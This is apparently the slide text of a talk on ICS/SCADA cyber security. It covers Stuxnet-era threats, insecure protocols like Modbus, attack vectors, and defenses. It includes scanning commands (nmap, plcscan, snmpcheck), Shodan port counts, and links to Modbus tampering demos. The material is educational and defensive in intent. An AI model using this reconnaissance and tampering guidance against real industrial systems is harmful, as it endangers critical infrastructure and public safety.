industrial control systems (ics) and cyber security
TRANSCRIPT
![Page 1: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/1.jpg)
ICS and Cyber Security
Özkan Erdoğan
![Page 2: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/2.jpg)
About me
12 years of experience in Cyber Security
Cyber Security Consultant
Ddos and Pen Tests
… Now working on ICS Security
@ozkan_erdogan
![Page 3: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/3.jpg)
Agenda
What are Cyber weapons
What is a critical infrastructure
ICS
Cyber weapons on ICS
Protocols
Threats
Attacks and Types of Attacks
Defense principles
![Page 4: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/4.jpg)
Cyber Weapon
Computer code
Aiming Threat or damage
Unlike other codes, might have pyhsical and psychological affects
Low cost- High damage
Target: system, people, country, critical infrastructures
![Page 5: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/5.jpg)
Critical Infrastructure
Energy
Water treatment
Hospitals
Nuclear reactors
Communication lines
Defense systems
All those systems are managed by ICS..
![Page 6: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/6.jpg)
Utility
Market: 1 trillion $
7391 cyber attack (a successfull attack could cause in average 1.2 milyon$)
Oil and Gas
Market: 2.4 trillion $
5493 cyber attack (a successfull attack could cause in average 4 milyon$)
![Page 7: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/7.jpg)
Why we use ICS
A brief description:
Converting signals from digital to analog, controlling equipment so they automatically function to our needs. i.e. in compliance with a logic that we program.. Example: Robot, valve, engine, generator, A/C,
Example: move a robot arm, turn on/off a water pump or valve, mix chemicals, flow control, increase/decrease temperature, measuring voltage, pumping oil and gas etc..
![Page 8: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/8.jpg)
Scada in Enterprise Network
![Page 9: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/9.jpg)
ICS, Scada and PLC DefinitionIndustrial Control System
![Page 10: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/10.jpg)
HMI
![Page 11: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/11.jpg)
PLC
![Page 12: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/12.jpg)
Scada Security (?)
CIA vs. AIC.
No encryption
No authentication
No authorization
Mostly default passwords
Security through obscurity
So called ‘Air gap’
Rule of ‘no touch’
![Page 13: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/13.jpg)
Cyber weapons targeted ICS
Most destructive: Stuxnet
A virus directly manipulating the process of uranium enrichment by Iran.
50 malwares targeting only Energy companies- Fireeye.
Havex/ Dragonfly: TCP ports 44818 (Omron, Rockwell Automation), 102 (Siemens) and 502 (Schneider Electric)
Flame: Cyber espionage (20 times bigger than Havex
BlackEnergy: Variants Targeting critical infrastructure
![Page 14: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/14.jpg)
Threat potential
Obama: Nuclear weapon result is either 0 or 1. However, cyber weapon is in a spectrum of 0-1 and you never know what its gonna cause.
John Kerry: 21.century version of nuclear attacks
Fenghui: Internet , if not controlled, could cause harm more than nuclears do.
![Page 16: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/16.jpg)
Scada architecture
Technics:
Many different vendors, protocols and processes.
Need to get over against air-gap
Convergence of OT to IT, protocols using TCP/IP
Patch and upgrade almost impossible (locking, restart issues)
![Page 17: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/17.jpg)
An ad
xxxx Bina Otomasyon Sistemi’nin mimarisi, programlanabilir kontrol ünitelerinden ve farklı nokta tip ve kapasitelerine sahip I/O üniteleri ile HMI (Dokunmatik Ekran) ünitelerinden oluşmaktadır. xxxxx en nemli özelliği, kontrol ünitelerinin doğrudan TCP-IP protokolü ile Ethernet’e çıkabilmesi, ftp ve web server özellikleriyle de INTERNET üzerinden sisteme erişim imkanı verebilmesidir. Bu sayede kullanıcılar uzaktan her hangi bir özel yazılıma ihtiyaç duymadan, web browser ile sistemle ilgili değerleri izleyebilmekte ve set değerlerini değiştirebilmektedirler.
xxxx Manager yazılımı kullanılarak, lokal veya uzaktan hatta internet bağlantısı ile kontrol ünitelerine bağlanıp, programlama yapmak mümkün olmaktadır
![Page 18: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/18.jpg)
Scada Manufacturers
Siemens.
Honeywell.
Tecnomatix (USDATA)
ABB
Tibbo Systems (AggreGate SCADA/HMI)
Schneider Electric (Wonderware, Televent Citect)
Survalent Technology Company (STC)
Rockwell
![Page 19: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/19.jpg)
Scada /ICS protocols
Modbus (Both way traffic, read/write, usually uses TCP/IP with single layer)
Profinet
DNP (Both way traffic, read/write, usually uses TCP/IP with single layer)
Siemens S7
IEC 60870
![Page 20: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/20.jpg)
ICS-Attack Vectors
Information Gathering
Scan (nmap, plcscan)
Arp poisoning
Traffic Capture/Replay
Exploit (Nessus plugins and Metasploit modules)
Brute force
![Page 21: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/21.jpg)
Information GatheringShodan, censys
Nmap
PLCScan
Masscan
Google hacking
![Page 22: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/22.jpg)
Cont’d
● Nmap, plcscan● Rule 1: Be gentle● Nmap -scan-delay=1 (-n omits dns) (Digital Bond has nmap specific scripts)● Do a tcp scan instead of syn (Don’t use half open)● Do not use fingerprinting● Do not use -Sc (scripting)● Do not use udp scan ● Snmpcheck -t IP
Gives you● Open udp, tcp ports● Service details
● Python plcscan.py IP (Scans port 102 and 502)
![Page 23: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/23.jpg)
ICS on Internet
![Page 24: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/24.jpg)
Shodan findings
Siemens S7- 100 x 102.port
DNP: 20 xport:20000
Modbus: 338 x port:502
IEC 60870: 38 x port: 2404
![Page 25: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/25.jpg)
Google dork
![Page 26: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/26.jpg)
Physical Attacks
Physical attacks against
PLC
RTU -
Smart meter
Relays
Circuit breakers
.
![Page 27: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/27.jpg)
Black box attacks
Web and ftp servers, field devices
Web based attacks
SQL injection
Privilege escalation
Trojan, Backdoor
Ddos
![Page 28: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/28.jpg)
Internal attacks
Traffic capture and replay
Man in the middle
Arp poisoning
Nessus (Scada Policy & Credential Check)
Metasploit
Wireshark
Python
![Page 29: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/29.jpg)
Defense
Patch management
DPI ?
Data diodes ?
Nw segmentation-Isolation
Awareness
Incident Response
![Page 30: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/30.jpg)
Fuzzers
Commercial
Codemicon
Wurdtech Achilles
peachfuzzer.com
Open:
Aegis ( https://www.automatak.com/aegis/)
![Page 31: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/31.jpg)
Modbus - tcpEncryption: NoneAuthentication: None
![Page 32: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/32.jpg)
Modbus Protocol Fields
![Page 33: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/33.jpg)
Modbus request packet
![Page 34: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/34.jpg)
Modbus Case study
PLC Simulator (Modbus PAL) and mbtget https://youtu.be/jxJ6921qrpE
Exploit via Metasploithttps://youtu.be/1bCrCFqgP-M
Tampering via Mbtgethttps://youtu.be/mGixseMvaMM
![Page 35: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/35.jpg)
Vulnerabilities
...and counting!!
![Page 36: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/36.jpg)
Case Study: Ukraine power outage
![Page 37: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/37.jpg)
Exploitation Tools
or buy from Agora Scada + ‘Made in Russia’
![Page 38: Industrial Control Systems (ICS) and Cyber Security](https://reader036.vdocuments.us/reader036/viewer/2022062302/58713a211a28abf0568b6925/html5/thumbnails/38.jpg)
The End-
Thank you...
Questions?